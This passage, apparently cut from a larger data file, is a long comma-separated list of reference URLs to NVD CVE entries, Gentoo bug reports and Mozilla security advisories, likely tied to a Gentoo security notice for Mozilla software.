"http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0084", "https://bugs.gentoo.org/show_bug.cgi?id=255687", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3182", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1953", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4205", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0062", "https://bugs.gentoo.org/show_bug.cgi?id=311021", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3767", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1840", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1964", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3069", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2991", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0016", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1197", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0076", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3765", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4180", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2981", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2754", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0065", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3175", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0773", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4066", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0079", "https://bugs.gentoo.org/show_bug.cgi?id=360055", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3994", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3375", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2378", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1970", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2471", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3982", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0163", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5506", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1994", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3663", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1833", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0160", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5512", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2769", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2477", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2374", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1945", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5015", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5022", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5500", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0648", "https://bugs.gentoo.org/show_bug.cgi?id=348316", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3167", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1972", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1975", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3836", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3981", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3995", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0469", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3962", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3382", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0460", "https://bugs.gentoo.org/show_bug.cgi?id=260062", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1306", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2535", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3654", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0067", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0774", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3972", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1305", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1211", "https://bugs.gentoo.org/show_bug.cgi?id=388045", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3178", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2404", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3984", "https://bugs.gentoo.org/show_bug.cgi?id=413657", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1974", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2044", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3957", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1199", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3978", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3768", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2210", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2983", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0070", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0458", "http://www.mozilla.org/security/announce/2011/mfsa2011-34.html", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3079", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5052", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1954", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1957", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0080", "http://www.mozilla.org/security/announce/2011/mfsa2011-11.html", "https://bugs.gentoo.org/show_bug.cgi?id=238535", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0077", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2436", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4196", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2466", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2467", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1946", "https://bugs.gentoo.org/show_bug.cgi?id=312651", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0073", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3991", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0164", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0083", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3380", "https://bugs.gentoo.org/show_bug.cgi?id=365323", "https://bugs.gentoo.org/show_bug.cgi?id=379549", "https://bugs.gentoo.org/show_bug.cgi?id=390771", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2479", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2996", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4212", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0452", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0475", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1585", "https://bugs.gentoo.org/show_bug.cgi?id=427224", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3988", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4202", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4582", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1836", "https://bugs.gentoo.org/show_bug.cgi?id=403183", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0776", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0220", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1839", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1308", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0168", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4508", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3975", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3967", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2370", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3174", "https://bugs.gentoo.org/show_bug.cgi?id=444318", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1209", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2987", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3980", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5833", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0182", "https://bugs.gentoo.org/show_bug.cgi?id=297532", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2465", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0771", "https://bugs.gentoo.org/show_bug.cgi?id=433383", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0455", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1313", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4063", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1044", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2770", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0085", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3837", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0352", "https://bugs.gentoo.org/show_bug.cgi?id=255221", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1947", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3985", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4210", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5016", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0462", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2470", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2752", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1169", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5508", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1201", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3640", "https://bugs.gentoo.org/show_bug.cgi?id=312675", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3379", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2993", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2478", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4190", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2464", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0444", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0181", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3078", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2462", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1835", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4215", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1828", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3990", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0450", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0461", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3071", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5839", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0477", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5505", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1949", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0057", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0066", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3647", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1028", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4070", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1213", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1966", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3070", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2365", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1210", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2995", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0463", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2469", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5507", "https://bugs.gentoo.org/show_bug.cgi?id=326341", "https://bugs.gentoo.org/show_bug.cgi?id=312763", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0159", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3003", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4195", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2989", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4216", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4207", "https://bugs.gentoo.org/show_bug.cgi?id=336396", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3993", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0445", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2437", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2753", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0054", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1960", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1563", "https://bugs.gentoo.org/show_bug.cgi?id=360315", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5074", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2982", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2463", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2372", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4194", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5504", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3131", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2760", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5913", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4064", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3232", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3775", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1958", "https://bugs.gentoo.org/show_bug.cgi?id=357057", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5012", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0358", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1304", "https://bugs.gentoo.org/show_bug.cgi?id=307045", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4186", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3766", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0179", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3835", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3659", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0183", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1214", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3389", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389", "https://bugs.gentoo.org/show_bug.cgi?id=408161", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2763", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5018", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5014", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3982", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0652", "https://bugs.gentoo.org/show_bug.cgi?id=439960", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3372", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0058", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3961", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3971", "https://bugs.gentoo.org/show_bug.cgi?id=381245", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1310", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3956", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3771", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2766", "https://bugs.gentoo.org/show_bug.cgi?id=292034", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3986", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3866", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0068", "https://bugs.gentoo.org/show_bug.cgi?id=282549", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4062", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1967", "https://bugs.gentoo.org/show_bug.cgi?id=437780", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3062", "https://bugs.gentoo.org/show_bug.cgi?id=280226", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3652", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0082", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3177", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3653", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4185", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4058", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2664", "https://bugs.gentoo.org/show_bug.cgi?id=251322", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4206", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2362", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3388", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3170", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1212", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1832", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3074", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3670", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5843", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3179", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3171", "https://bugs.gentoo.org/show_bug.cgi?id=342847", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3381", "https://bugs.gentoo.org/show_bug.cgi?id=262704", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5501", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2999", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3376", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0441", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3377", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5013", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3969", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2768", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3776", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1939", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1303", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5019", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2990", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3075", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4059", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4068", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3989", "https://bugs.gentoo.org/show_bug.cgi?id=280234", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4182", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1963", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0056", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2755", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0053", "https://bugs.gentoo.org/show_bug.cgi?id=284439", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3973", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3176", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4061", "https://bugs.gentoo.org/show_bug.cgi?id=180159", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1971", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0356", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5017", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1951", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2061", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5822", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2363", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3399", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0069", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3001", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2373", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0446", "https://bugs.gentoo.org/show_bug.cgi?id=401701", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1203", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0777", "http://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-certificates/", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1838", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3965", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5835", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3770", "https://bugs.gentoo.org/show_bug.cgi?id=273918", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5838", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0074", "https://bugs.gentoo.org/show_bug.cgi?id=280393", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2364", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0459", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2765", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3983", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3274", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1948", "https://bugs.gentoo.org/show_bug.cgi?id=312361", "https://bugs.gentoo.org/show_bug.cgi?id=329279", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2375", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0456", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0071", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3769", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3180", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1837", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1950", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0162", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2043", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3772", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3979", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1955", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174", "https://bugs.gentoo.org/show_bug.cgi?id=286721", "https://bugs.gentoo.org/show_bug.cgi?id=341821", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0467", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3173", "https://bugs.gentoo.org/show_bug.cgi?id=419917", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1215", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0178", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5023", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5836", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0357", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3168", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3960", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1940", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3651", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2377", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2472", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2665", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4065", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2671", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0443", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1965", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1208", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3649", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3000", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0471", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3978", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0075", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3166", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3378", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4179", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3383", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1198", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4209", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5840", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1961", "https://bugs.gentoo.org/show_bug.cgi?id=181361", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1959", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3986", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0051", "https://bugs.gentoo.org/show_bug.cgi?id=312679", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3778", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2662", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3970", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3648", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3183", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3101", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1938", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0464", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5841", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5829", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0059", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1200", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3072", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3374", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3169", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2371", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2985", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0654", "https://bugs.gentoo.org/show_bug.cgi?id=255234", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4201", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5502", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3988", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2369", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2408", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1207", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4060", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1941", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1312", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0478", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1206", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1302", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3976", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3371", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0367", 